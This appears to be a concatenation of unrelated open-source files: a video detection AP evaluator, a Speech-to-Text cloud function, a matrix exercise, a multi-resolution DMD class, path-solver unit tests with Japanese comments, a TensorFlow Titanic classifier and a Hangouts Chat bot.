del gt[gt_this_index[argmax]]
if ispositive:
tp += 1
fn -= 1
else:
fp += 1
pr[i+1,0] = float(tp)/float(tp+fp)
pr[i+1,1] = float(tp)/float(tp+fn + 0.00001)
ap = voc_ap(pr)
return ap
def gt_to_videts(gt_v):
# return [label, video_index, [[frame_index, x1,y1,x2,y2], [], []] ]
keys = list(gt_v.keys())
keys.sort()
res = []
for i in range(len(keys)):
# annotation of the video: tubes and gt_classes
v_annot = gt_v[keys[i]]
for j in range(len(v_annot['tubes'])):
res.append([v_annot['gt_classes'], i+1, v_annot['tubes'][j]])
return res
def evaluate_videoAP(gt_videos, all_boxes, CLASSES, iou_thresh = 0.2, bTemporal = False, prior_length = None):
'''
gt_videos: {vname:{tubes: [[frame_index, x1,y1,x2,y2]], gt_classes: vlabel}}
all_boxes: {imgname:{cls_ind:array[x1,y1,x2,y2, cls_score]}}
'''
def imagebox_to_videts(img_boxes, CLASSES):
# image names
keys = list(all_boxes.keys())
keys.sort()
res = []
# without 'background'
for cls_ind, cls in enumerate(CLASSES[0:]):
v_cnt = 1
frame_index = 1
v_dets = []
cls_ind += 1
# get the directory path of images
preVideo = os.path.dirname(keys[0])
for i in range(len(keys)):
curVideo = os.path.dirname(keys[i])
img_cls_dets = img_boxes[keys[i]][cls_ind]
v_dets.append([frame_index, img_cls_dets])
frame_index += 1
if preVideo!=curVideo:
preVideo = curVideo
frame_index = 1
# tmp_dets = v_dets[-1]
del v_dets[-1]
res.append([cls_ind, v_cnt, v_dets])
v_cnt += 1
v_dets = []
# v_dets.append(tmp_dets)
v_dets.append([frame_index, img_cls_dets])
frame_index += 1
# the last video
# print('num of videos:{}'.format(v_cnt))
res.append([cls_ind, v_cnt, v_dets])
return res
gt_videos_format = gt_to_videts(gt_videos)
pred_videos_format = imagebox_to_videts(all_boxes, CLASSES)
ap_all = []
for cls_ind, cls in enumerate(CLASSES[0:]):
cls_ind += 1
# [ video_index, [[frame_index, x1,y1,x2,y2]] ]
gt = [g[1:] for g in gt_videos_format if g[0]==cls_ind]
pred_cls = [p[1:] for p in pred_videos_format if p[0]==cls_ind]
cls_len = None
ap = video_ap_one_class(gt, pred_cls, iou_thresh, bTemporal, cls_len)
ap_all.append(ap)
return ap_all
|
the-stack_106_19139
|
# Copyright 2022 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import datetime,time
import re,json
from google.cloud import storage
from google.cloud.storage.blob import Blob
from google.cloud import speech_v1p1beta1 as speech
gcs_results_stt = os.environ['gcs_results_stt']
def gcp_storage_upload_string(source_string, bucket_name, blob_name):
try:
storage_client = storage.Client()
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(blob_name)
blob.upload_from_string(source_string)
except Exception as e:
print('[ ERROR ] Failed to upload to GCS. {}'.format(e))
def gcp_storage_download_as_string(bucket_name, blob_name):
'''
Downloads a blob from the bucket, and outputs as a string.
'''
try:
storage_client = storage.Client()
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(blob_name)
blob_content = blob.download_as_string()
return blob_content
except Exception as e:
print('[ EXCEPTION ] {}'.format(e))
def gcp_speech_to_text_long(gcs_uri, gcs_object_name):
print(f'[ INFO ] Starting gcp_speech_to_text_long against {gcs_uri}')
start_time = datetime.datetime.now()
speech_client = speech.SpeechClient()
audio = speech.RecognitionAudio(uri=gcs_uri)
config = speech.RecognitionConfig(
#encoding=speech.RecognitionConfig.AudioEncoding.FLAC,
#sample_rate_hertz=16000,
#audio_channel_count=2,
#enable_separate_recognition_per_channel=True,
language_code="en-US",
enable_automatic_punctuation=True,
)
output_transcription_name = re.sub('.flac$','.json', gcs_object_name)
output_config = speech.TranscriptOutputConfig(gcs_uri=f"gs://{gcs_results_stt}/{output_transcription_name}")
request = speech.LongRunningRecognizeRequest(config=config, audio=audio, output_config=output_config)
operation = speech_client.long_running_recognize(request=request)
print(f'[ INFO ] Operation: {operation.metadata}')
print(f'[ INFO ] Operation: {operation.result}')
return True
def main(event,context):
# Only process .flac files
if re.search('\.flac$', event['name'].lower().strip()):
gcs_uri = 'gs://{}/{}'.format(event['bucket'], event['name'])
print('[ INFO ] Processing {}'.format(gcs_uri))
text_blob = gcp_speech_to_text_long(gcs_uri, gcs_object_name=event['name'])
return '200'
|
the-stack_106_19140
|
from itertools import chain
def get_squares(matrix):
squares = []
for i in range(len(matrix) - 2):
row = matrix[i]
for j in range(len(row) - 2):
square = [
[matrix[i][j], matrix[i][j + 1], matrix[i][j + 2]],
[matrix[i + 1][j], matrix[i + 1][j + 1], matrix[i + 1][j + 2]],
[matrix[i + 2][j], matrix[i + 2][j + 1], matrix[i + 2][j + 2]]
]
squares.append(square)
return squares
def get_sum_of_matrix(matrix):
return sum(chain(*matrix))
def get_max_square(squares):
max_square = None
max_square_sum = 0
for square in squares:
square_sum = get_sum_of_matrix(square)
if max_square is None or square_sum > max_square_sum:
max_square = square
max_square_sum = square_sum
return max_square
n, m = [int(x) for x in input().split()]
matrix = [[int(x) for x in input().split()] for _ in range(n)]
squares = get_squares(matrix)
max_square = get_max_square(squares)
print(f"Sum = {get_sum_of_matrix(max_square)}")
print('\n'.join([' '.join(map(str, row)) for row in max_square]))
############## Tanya's solution ##############
# rows, cols = [int(x) for x in input().split()]
# matrix = []
# best_sum = -99999999999999
# best_matrix = []
#
# for _ in range(rows):
# line = [int(x) for x in input().split()]
# matrix.append(line)
#
# for row in range(rows - 2):
# for col in range(cols - 2):
# sub_matrix = []
# current_sum = 0
# row_counter = 0
# for r in range(row, row + 3):
# sub_matrix.append([])
# for c in range(col, col + 3):
# sub_matrix[row_counter].append(matrix[r][c])
# current_sum += matrix[r][c]
# row_counter += 1
# if current_sum > best_sum:
# best_sum = current_sum
# best_matrix = sub_matrix
#
# print(f"Sum = {best_sum}")
# for row in best_matrix:
# print(' '.join([str(x) for x in row]))
|
the-stack_106_19141
|
"""
Derived module from dmdbase.py for multi-resolution dmd.
Reference:
- Kutz, J. Nathan, Xing Fu, and Steven L. Brunton. Multiresolution Dynamic Mode
Decomposition. SIAM Journal on Applied Dynamical Systems 15.2 (2016): 713-735.
"""
from __future__ import division
from builtins import range
from past.utils import old_div
import numpy as np
import scipy.linalg
import matplotlib.pyplot as plt
from .dmdbase import DMDBase
class MrDMD(DMDBase):
"""
Multi-resolution Dynamic Mode Decomposition
:param svd_rank: the rank for the truncation; If 0, the method computes the
optimal rank and uses it for truncation; if positive interger, the
method uses the argument for the truncation; if float between 0 and 1,
the rank is the number of the biggest singular values that are needed
to reach the 'energy' specified by `svd_rank`; if -1, the method does
not compute truncation.
:type svd_rank: int or float
:param int tlsq_rank: rank truncation computing Total Least Square. Default
is 0, that means TLSQ is not applied.
:param bool exact: flag to compute either exact DMD or projected DMD.
Default is False.
:param bool opt: flag to compute optimal amplitudes. See :class:`DMDBase`.
Default is False.
:param rescale_mode: Scale Atilde as shown in
10.1016/j.jneumeth.2015.10.010 (section 2.4) before computing its
eigendecomposition. None means no rescaling, 'auto' means automatic
rescaling using singular values, otherwise the scaling factors.
:type rescale_mode: {'auto'} or None or numpy.ndarray
:param int max_cycles: the maximum number of mode oscillations in any given
time scale. Default is 1.
:param int max_level: the maximum number of levels. Defualt is 6.
"""
def __init__(self,
svd_rank=0,
tlsq_rank=0,
exact=False,
opt=False,
max_cycles=1,
max_level=6,
rescale_mode=None):
super(MrDMD, self).__init__(svd_rank, tlsq_rank, exact, opt,
rescale_mode)
self.max_cycles = max_cycles
self.max_level = max_level
self._nsamples = None
self._steps = None
def _index_list(self, level, node):
"""
Private method that return the right index element from a given level
and node.
:param int level: the level in the binary tree.
:param int node: the node id.
:rtype: int
:return: the index of the list that contains the binary tree.
"""
if level >= self.max_level:
raise ValueError("Invalid level: greater than `max_level`")
if node >= 2**level:
raise ValueError("Invalid node")
return 2**level + node - 1
def _index_list_reversed(self, index):
"""
Method that return the level and node given the index of the bin.
:param int index: the index of the bin in the binary tree.
:return: the level of the bin in the binary tree and the node id
in that level.
"""
if index > 2**self.max_level - 2:
raise ValueError("Invalid index: maximum index is ({})".format(2**self.max_level - 2))
for lvl in range(self.max_level + 1):
if index < 2**lvl - 1:
break
level = lvl - 1
node = index - 2**level + 1
return level, node
def partial_time_interval(self, level, node):
"""
Evaluate the start and end time and the period of a given bin.
:param int level: the level in the binary tree.
:param int node: the node id.
:return: the start and end time and the period of the bin
:rtype: dictionary
"""
if level >= self.max_level:
raise ValueError(
'The level input parameter ({}) has to be less than the '
'max_level ({}). Remember that the starting index is 0'.format(
level, self.max_level))
if node >= 2**level:
raise ValueError("Invalid node")
full_period = self.original_time['tend'] - self.original_time['t0']
period = full_period / 2**level
t0 = self.original_time['t0'] + period*node
tend = t0 + period
return {'t0': t0, 'tend':tend, 'dt':period}
def time_window_bins(self, t0, tend):
"""
Find which bins are embedded (partially or totally) in a given
time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: indexes of the bins seen by the time window.
:rtype: numpy.ndarray
"""
indexes = []
for level in range(self.max_level):
for i in range(2**level):
local_times = self.partial_time_interval(level, i)
if t0 >= local_times['t0'] and t0 < local_times['tend']:
indexes.append(self._index_list(level, i))
if tend > local_times['t0'] and tend <= local_times['tend']:
indexes.append(self._index_list(level, i))
if t0 <= local_times['t0'] and tend >= local_times['tend']:
indexes.append(self._index_list(level, i))
# Remove duplicates if they exist
# indexes = list(dict.fromkeys(indexes)) # Python 3.7 or later (preserve order)
indexes = list(set(indexes)) # Any Python version, but does not preserve order
indexes = np.sort(indexes)
return indexes
def time_window_eigs(self, t0, tend):
"""
Get the eigenvalues relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the eigenvalues for that time window.
:rtype: numpy.ndarray
"""
indexes = self.time_window_bins(t0, tend)
return np.concatenate([self._eigs[idx] for idx in indexes])
def time_window_frequency(self, t0, tend):
"""
Get the frequencies relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the frequencies for that time window.
:rtype: numpy.ndarray
"""
eigs = self.time_window_eigs(t0, tend)
return np.log(eigs).imag/(2*np.pi*self.original_time['dt'])
def time_window_growth_rate(self, t0, tend):
"""
Get the growth rate values relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the Floquet values for that time window.
:rtype: numpy.ndarray
"""
return self.time_window_eigs(t0, tend).real/self.original_time['dt']
def time_window_amplitudes(self, t0, tend):
"""
Get the amplitudes relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the amplitude of the modes for that time window.
:rtype: numpy.ndarray
"""
indexes = self.time_window_bins(t0, tend)
return np.concatenate([self._b[idx] for idx in indexes])
@property
def reconstructed_data(self):
"""
Get the reconstructed data.
:return: the matrix that contains the reconstructed snapshots.
:rtype: numpy.ndarray
"""
try:
data = np.sum(
np.array([
self.partial_reconstructed_data(i)
for i in range(self.max_level)
]),
axis=0)
except MemoryError:
data = np.array(self.partial_reconstructed_data(0))
for i in range(1, self.max_level):
data = np.sum([data,
np.array(self.partial_reconstructed_data(i))], axis=0)
return data
@property
def modes(self):
"""
Get the matrix containing the DMD modes, stored by column.
:return: the matrix containing the DMD modes.
:rtype: numpy.ndarray
"""
return np.hstack(tuple(self._modes))
@property
def dynamics(self):
"""
Get the time evolution of each mode.
:return: the matrix that contains all the time evolution, stored by
row.
:rtype: numpy.ndarray
"""
return np.vstack(
tuple([self.partial_dynamics(i) for i in range(self.max_level)]))
@property
def eigs(self):
"""
Get the eigenvalues of A tilde.
:return: the eigenvalues from the eigendecomposition of `atilde`.
:rtype: numpy.ndarray
"""
return np.concatenate(self._eigs)
def partial_modes(self, level, node=None):
"""
Return the modes at the specific `level` and at the specific `node`; if
`node` is not specified, the method returns all the modes of the given
`level` (all the nodes).
:param int level: the index of the level from where the modes are
extracted.
:param int node: the index of the node from where the modes are
extracted; if None, the modes are extracted from all the nodes of
the given level. Default is None.
"""
if node:
return self._modes[self._index_list(level, node)]
indeces = [self._index_list(level, i) for i in range(2**level)]
return np.hstack(tuple([self._modes[idx] for idx in indeces]))
def partial_dynamics(self, level, node=None):
"""
Return the time evolution of the specific `level` and of the specific
`node`; if `node` is not specified, the method returns the time
evolution of the given `level` (all the nodes).
:param int level: the index of the level from where the time evolution
is extracted.
:param int node: the index of the node from where the time evolution is
extracted; if None, the time evolution is extracted from all the
nodes of the given level. Default is None.
"""
def dynamic(eigs, amplitudes, step, nsamples):
omega = old_div(
np.log(np.power(eigs, old_div(1., step))),
self.original_time['dt'])
partial_timestep = np.arange(nsamples) * self.dmd_time['dt']
vander = np.exp(np.multiply(*np.meshgrid(omega, partial_timestep)))
return (vander * amplitudes).T
if node:
indeces = [self._index_list(level, node)]
else:
indeces = [self._index_list(level, i) for i in range(2**level)]
level_dynamics = [
dynamic(self._eigs[idx], self._b[idx], self._steps[idx],
self._nsamples[idx]) for idx in indeces
]
return scipy.linalg.block_diag(*level_dynamics)
def partial_eigs(self, level, node=None):
"""
Return the eigenvalues of the specific `level` and of the specific
`node`; if `node` is not specified, the method returns the eigenvalues
of the given `level` (all the nodes).
:param int level: the index of the level from where the eigenvalues is
extracted.
:param int node: the index of the node from where the eigenvalues is
extracted; if None, the time evolution is extracted from all the
nodes of the given level. Default is None.
"""
if level >= self.max_level:
raise ValueError(
'The level input parameter ({}) has to be less than the'
'max_level ({}). Remember that the starting index is 0'.format(
level, self.max_level))
if node:
return self._eigs[self._index_list(level, node)]
indeces = [self._index_list(level, i) for i in range(2**level)]
return np.concatenate([self._eigs[idx] for idx in indeces])
def partial_reconstructed_data(self, level, node=None):
"""
Return the reconstructed data computed using the modes and the time
evolution at the specific `level` and at the specific `node`; if `node`
is not specified, the method returns the reconstructed data
of the given `level` (all the nodes).
:param int level: the index of the level.
:param int node: the index of the node from where the time evolution is
extracted; if None, the time evolution is extracted from all the
nodes of the given level. Default is None.
"""
if level >= self.max_level:
raise ValueError(
'The level input parameter ({}) has to be less than the '
'max_level ({}). Remember that the starting index is 0'.format(
level, self.max_level))
modes = self.partial_modes(level, node)
dynamics = self.partial_dynamics(level, node)
return modes.dot(dynamics)
def fit(self, X):
"""
Compute the Dynamic Modes Decomposition to the input data.
:param X: the input snapshots.
:type X: numpy.ndarray or iterable
"""
self._snapshots, self._snapshots_shape = self._col_major_2darray(X)
# To avoid recursion function, use FIFO list to simulate the tree
# structure
data_queue = [self._snapshots.copy()]
current_bin = 0
# Redefine max level if it is too big.
lvl_threshold = int(np.log(self._snapshots.shape[1]/4.)/np.log(2.)) + 1
if self.max_level > lvl_threshold:
self.max_level = lvl_threshold
print('Too many levels... '
'Redefining `max_level` to {}'.format(self.max_level))
# Reset the lists
self._eigs = []
self._Atilde = []
self._modes = []
self._b = []
self._nsamples = []
self._steps = []
while data_queue:
Xraw = data_queue.pop(0)
n_samples = Xraw.shape[1]
# subsamples frequency to detect slow modes
nyq = 8 * self.max_cycles
step = max(1, int(np.floor(old_div(n_samples, nyq))))
Xsub = Xraw[:, ::step]
Xc = Xsub[:, :-1]
Yc = Xsub[:, 1:]
Xc, Yc = self._compute_tlsq(Xc, Yc, self.tlsq_rank)
U, s, V = self._compute_svd(Xc, self.svd_rank)
Atilde = self._build_lowrank_op(U, s, V, Yc)
eigs, modes = self._eig_from_lowrank_op(Atilde, Yc, U, s, V,
self.exact)
rho = old_div(float(self.max_cycles), n_samples)
slow_modes = (np.abs(
old_div(np.log(eigs), (2. * np.pi * step)))) <= rho
modes = modes[:, slow_modes]
eigs = eigs[slow_modes]
#---------------------------------------------------------------
# DMD Amplitudes and Dynamics
#---------------------------------------------------------------
Vand = np.vander(
np.power(eigs, old_div(1., step)), n_samples, True)
b = self._compute_amplitudes(modes, Xc, eigs, self.opt)
Psi = (Vand.T * b).T
self._modes.append(modes)
self._b.append(b)
self._Atilde.append(Atilde)
self._eigs.append(eigs)
self._nsamples.append(n_samples)
self._steps.append(step)
if Xraw.dtype == 'float64':
Xraw -= modes.dot(Psi).real
else:
Xraw -= modes.dot(Psi)
if current_bin < 2**(self.max_level - 1) - 1:
current_bin += 1
half = int(np.ceil(old_div(Xraw.shape[1], 2)))
data_queue.append(Xraw[:, :half])
data_queue.append(Xraw[:, half:])
else:
current_bin += 1
self.dmd_time = {'t0': 0, 'tend': self._snapshots.shape[1], 'dt': 1}
self.original_time = self.dmd_time.copy()
return self
def plot_eigs(self,
show_axes=True,
show_unit_circle=True,
figsize=(8, 8),
title='',
level=None,
node=None):
"""
Plot the eigenvalues.
:param bool show_axes: if True, the axes will be showed in the plot.
Default is True.
:param bool show_unit_circle: if True, the circle with unitary radius
and center in the origin will be showed. Default is True.
:param tuple(int,int) figsize: tuple in inches of the figure.
:param str title: title of the plot.
:param int level: plot only the eigenvalues of specific level.
:param int node: plot only the eigenvalues of specific node.
"""
if self._eigs is None:
raise ValueError('The eigenvalues have not been computed.'
'You have to perform the fit method.')
if level:
peigs = self.partial_eigs(level=level, node=node)
else:
peigs = self.eigs
plt.figure(figsize=figsize)
plt.title(title)
plt.gcf()
ax = plt.gca()
if not level:
cmap = plt.get_cmap('viridis')
colors = [cmap(i) for i in np.linspace(0, 1, self.max_level)]
points = []
for lvl in range(self.max_level):
indeces = [self._index_list(lvl, i) for i in range(2**lvl)]
eigs = np.concatenate([self._eigs[idx] for idx in indeces])
points.append(
ax.plot(eigs.real, eigs.imag, '.', color=colors[lvl])[0])
else:
points = []
points.append(
ax.plot(peigs.real, peigs.imag, 'bo', label='Eigenvalues')[0])
# set limits for axis
limit = np.max(np.ceil(np.absolute(peigs)))
ax.set_xlim((-limit, limit))
ax.set_ylim((-limit, limit))
plt.ylabel('Imaginary part')
plt.xlabel('Real part')
if show_unit_circle:
unit_circle = plt.Circle(
(0., 0.), 1., color='green', fill=False, linestyle='--')
ax.add_artist(unit_circle)
# Dashed grid
gridlines = ax.get_xgridlines() + ax.get_ygridlines()
for line in gridlines:
line.set_linestyle('-.')
ax.grid(True)
ax.set_aspect('equal')
# x and y axes
if show_axes:
ax.annotate(
'',
xy=(np.max([limit * 0.8, 1.]), 0.),
xytext=(np.min([-limit * 0.8, -1.]), 0.),
arrowprops=dict(arrowstyle="->"))
ax.annotate(
'',
xy=(0., np.max([limit * 0.8, 1.])),
xytext=(0., np.min([-limit * 0.8, -1.])),
arrowprops=dict(arrowstyle="->"))
# legend
if level:
labels = ['Eigenvalues - level {}'.format(level)]
else:
labels = [
'Eigenvalues - level {}'.format(i)
for i in range(self.max_level)
]
if show_unit_circle:
points += [unit_circle]
labels += ['Unit circle']
ax.add_artist(plt.legend(points, labels, loc='best'))
plt.show()
|
the-stack_106_19143
|
from BlockCirclesPath import BlockCirclesSolver
from BlockCirclesPath import BlockCirclesTracks
import unittest
class BlockCirclesSolverTest(unittest.TestCase):
"""
BlockCirclesSolverのテストクラス
"""
def test_enter_block_circle(self):
"""
enter_block_circle()のテストコード
確認事項
1. 4番サークルにカラーブロックが置かれている場合、6番に進入すること
2. 6番サークルに黒ブロックが置かれている場合、6番に進入すること
3. 上記2条件に当てはまらない場合、4番に進入すること
"""
# 確認事項1.のテスト
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
if black == 4 or bonus == black:
continue
solver = BlockCirclesSolver(bonus, black, 4, True)
self.assertEqual((2, 0), solver.enter_block_circle())
# 確認事項2.のテスト
for bonus in range(1, 8 + 1):
for color in range(1, 8 + 1):
if bonus == 6 or color == 6:
continue
solver = BlockCirclesSolver(bonus, 6, color, True)
self.assertEqual((2, 0), solver.enter_block_circle())
# 確認事項3.のテスト
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
# ブロックビンゴのルールによる制約
if bonus == black or black == color:
# 例外的な2条件を省くための制約
if color == 4 or black == 6:
continue
solver = BlockCirclesSolver(bonus, black, color, True)
self.assertEqual((1, 0), solver.enter_block_circle())
def test_enter_block_circle_right(self):
"""
enter_block_circle()のテストコード Rコース版
確認事項
1. 5番サークルにカラーブロックが置かれている場合、8番に進入すること
2. 8番サークルに黒ブロックが置かれている場合、8番に進入すること
3. 上記2条件に当てはまらない場合、5番に進入すること
"""
# 確認事項1. のテスト
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
if black == 5 or bonus == black:
continue
solver = BlockCirclesSolver(bonus, black, 5, False)
self.assertEqual((2, 2), solver.enter_block_circle())
# 確認事項2. のテスト
for bonus in range(1, 8 + 1):
for color in range(1, 8 + 1):
if bonus == 8 or color == 8:
continue
solver = BlockCirclesSolver(bonus, 8, color, False)
self.assertEqual((2, 2), solver.enter_block_circle())
# 確認事項3. のテスト
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
# ブロックビンゴのルールによる制約
if bonus == black or black == color:
# 例外的な2条件を省くための制約
if color == 5 or black == 8:
continue
solver = BlockCirclesSolver(bonus, black, color, False)
self.assertEqual((1, 2), solver.enter_block_circle())
def test_path_to_catch_block(self):
"""
path_to_catch_block()のテストコード
確認事項
1. 求めた経路内にカラーブロックが置かれたサークルは存在しないこと
2. 求めた経路内に進入サークルは含まれていないこと
"""
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
# ブロックビンゴのルールによる制約
if bonus == black or black == color:
continue
solver = BlockCirclesSolver(bonus, black, color, True)
enter = solver.enter_block_circle()
path = solver.path_to_catch_block(enter, BlockCirclesTracks(solver.coordinate))
# 確認事項1.のテスト
self.assertTrue(solver.coordinate.get(color) not in path)
# 確認事項2.のテスト
self.assertTrue(enter not in path)
def test_path_to_bonus_circle(self):
"""
path_to_bonus_circle()のテストコード
確認事項
1. 求めた経路内に黒ブロックが置かれたサークルは存在しないこと
2. 求めた経路の末尾を除いて、カラーブロックが置かれたサークルは存在しないこと
"""
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
# ブロックビンゴのルールによる制約
if bonus == black or black == color:
continue
solver = BlockCirclesSolver(bonus, black, color, True)
path = solver.path_to_bonus_circle(BlockCirclesTracks(solver.coordinate))
# 確認事項1.のテスト
self.assertTrue(solver.coordinate.get(black) not in path)
# 確認事項2.のテスト
self.assertTrue(solver.coordinate.get(color) not in path[0:-1])
def solve(self, is_left):
"""
solve()のテストコード
確認事項
1. 求めた経路の先頭は、進入サークルの座標になっていること
2. 求めた経路の末尾は、ボーナスサークルの座標になっていること
3. 求めた経路の末尾を除いて、カラーブロックが置かれたサークルは存在しないこと
"""
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
# ブロックビンゴのルールによる制約
if bonus == black or black == color:
continue
solver = BlockCirclesSolver(bonus, black, color, is_left)
enter = solver.enter_block_circle()
path = solver.solve()
# 確認事項1.のテスト
self.assertEqual(enter, path[0])
# 確認事項2.のテスト
self.assertEqual(solver.coordinate.get(bonus), path[-1])
# 確認事項3.のテスト
self.assertTrue(solver.coordinate.get(color) not in path[0:-1])
def test_solve_left(self):
self.solve(True)
def test_solve_right(self):
self.solve(False)
def test_subset_of_tracks(self):
"""
subset_of_tracks()のテストコード
確認事項
1. リストに含まれない要素が指定されたときはNoneを返すこと
2. 部分集合の先頭は、始点を含まないこと
3. 部分集合の末尾は、終点を含むこと
4. 始点が終点よりも大きい場合の部分集合は、元のリストから(終点→始点の場合の部分集合)を引いた差集合になっていること
5. 4.の条件を除いて部分集合は、元のリストの順序を保った状態の部分集合となっていること
"""
original = [i + 1 for i in range(0, 5)] # [1, 2, 3, 4, 5]
solver = BlockCirclesSolver(1, 2, 3, True) # 引数の値は適当
# 確認事項1.のテスト
self.assertIsNone(solver.subset_of_tracks(0, 3, original))
self.assertIsNone(solver.subset_of_tracks(2, 6, original))
# 確認事項2.のテスト
self.assertTrue(1 not in solver.subset_of_tracks(1, 3, original))
# 確認事項3.のテスト
self.assertTrue(3 in solver.subset_of_tracks(1, 3, original))
# 確認事項4.のテスト
subtrahend = solver.subset_of_tracks(2, 4, original) # [3, 4]
subset = solver.subset_of_tracks(4, 2, original) # [5, 1, 2]
self.assertEqual(set(original) - set(subtrahend), set(subset))
# 確認事項5.のテスト
start = original.index(2) + 1
goal = original.index(5) + 1
self.assertEqual(original[start:goal], solver.subset_of_tracks(2, 5, original))
if __name__ == '__main__':
unittest.main()
|
the-stack_106_19144
|
from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.compat.v2.feature_column as fc
import os
def make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):
#epochs(quantas vezes verei o codigo)/batch(tamanho do foton de dados)/data(x)/label(y)
def input_function(): #tranforma o retorno em uma função
ds = tf.data.Dataset.from_tensor_slices((dict(x_train), y_train))#preparando o tensor treino
if shuffle:
ds = ds.shuffle(1000)#embaralha os dados
ds = ds.batch(batch_size).repeat(num_epochs)#treina varias vezes
return ds
return input_function
x_train = pd.read_csv(r'C:\Users\vinis\Downloads\train.csv')
x_test = pd.read_csv(r'C:\Users\vinis\Downloads\eval.csv')
'''sns.pairplot(dbtrain)
plt.show()
sns.heatmap(dbtrain.corr(), cmap='Wistia', annot=True)
plt.show()
so pega as colunas numericas......'''
y_train = x_train.pop('survived') #pop tira essa coluna do db e salva na variavel em questão
y_test = x_test.pop('survived')
pd.concat([x_train, y_train], axis=1).groupby('sex').survived.mean().plot(kind='barh').set_xlabel('% survived')
#plt.show()#porcentagem de sobreviventes por sexo
#Transformando categorias em numeros:
feature_list = []
categorical_column = ['sex', 'class', 'deck', 'embark_town', 'alone']
numeric_column = ['age', 'fare', 'n_siblings_spouses', 'parch']
for item in categorical_column:
vocabulary = x_train[item].unique()
feature_list.append(tf.feature_column.categorical_column_with_vocabulary_list(item, vocabulary))
#gera uma lista com os valores unicos de cada item e add eles
for item in numeric_column:
feature_list.append(tf.feature_column.numeric_column(item, dtype=tf.float32))#add os valores numaricos
#Treinando modelo:
train_input_data = make_input_fn(x_train, y_train)
test_input_data = make_input_fn(x_test, y_test, num_epochs=1, shuffle=False)
linear_est = tf.estimator.LinearClassifier(feature_columns=feature_list)
linear_est.train(train_input_data) #treina
result = linear_est.evaluate(test_input_data)#testa
os.system('cls')
print(result)
#Para prever:
result = linear_est.predict('POR AQUI UMA LINHA INTEIRA DE DADOS')
|
the-stack_106_19145
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from apiclient.discovery import build, build_from_document
from flask import Flask, render_template, request, json, make_response
from httplib2 import Http
from oauth2client.service_account import ServiceAccountCredentials
app = Flask(__name__)
INTERACTIVE_TEXT_BUTTON_ACTION = "doTextButtonAction"
INTERACTIVE_IMAGE_BUTTON_ACTION = "doImageButtonAction"
INTERACTIVE_BUTTON_PARAMETER_KEY = "param_key"
BOT_HEADER = 'Card Bot Python'
@app.route('/', methods=['POST'])
def home_post():
"""Respond to POST requests to this endpoint.
All requests sent to this endpoint from Hangouts Chat are POST
requests.
"""
event_data = request.get_json()
resp = None
# If the bot is removed from the space, it doesn't post a message
# to the space. Instead, log a message showing that the bot was removed.
if event_data['type'] == 'REMOVED_FROM_SPACE':
logging.info('Bot removed from %s' % event_data['space']['name'])
return 'OK'
elif event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'ROOM':
resp = { 'text': ('Thanks for adding me to {}!'
.format(event_data['space']['name'])) }
elif event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'DM':
resp = { 'text': ('Thanks for adding me to a DM, {}!'
.format(event_data['user']['displayName'])) }
elif event_data['type'] == 'MESSAGE':
resp = create_card_response(event_data['message']['text'])
elif event_data['type'] == 'CARD_CLICKED':
action_name = event_data['action']['actionMethodName']
parameters = event_data['action']['parameters']
resp = respond_to_interactive_card_click(action_name, parameters)
space_name = event_data['space']['name']
logging.info(resp)
# Uncomment the following line for a synchronous response.
#return json.jsonify(resp)
# Asynchronous response version:
thread_id = None
if event_data['message']['thread'] != None:
thread_id = event_data['message']['thread']
# Need to return a response to avoid an error in the Flask app
send_async_response(resp, space_name, thread_id)
return 'OK'
@app.route('/', methods=['GET'])
def home_get():
"""Respond to GET requests to this endpoint.
This function responds to requests with a simple HTML landing page for this
App Engine instance.
"""
return render_template('home.html')
def send_async_response(response, space_name, thread_id):
"""Sends a response back to the Hangouts Chat room asynchronously.
Args:
response: the response payload
spaceName: The URL of the Hangouts Chat room
"""
# The following two lines of code update the thread that raised the event.
# Delete them if you want to send the message in a new thread.
if thread_id != None:
response['thread'] = thread_id
##################################
scopes = ['https://www.googleapis.com/auth/chat.bot']
credentials = ServiceAccountCredentials.from_json_keyfile_name(
'service-acct.json', scopes)
http_auth = credentials.authorize(Http())
chat = build('chat', 'v1', http=http_auth)
chat.spaces().messages().create(
parent=space_name,
body=response).execute()
def create_card_response(event_message):
"""Creates a card response based on the message sent in Hangouts Chat.
See the reference for JSON keys and format for cards:
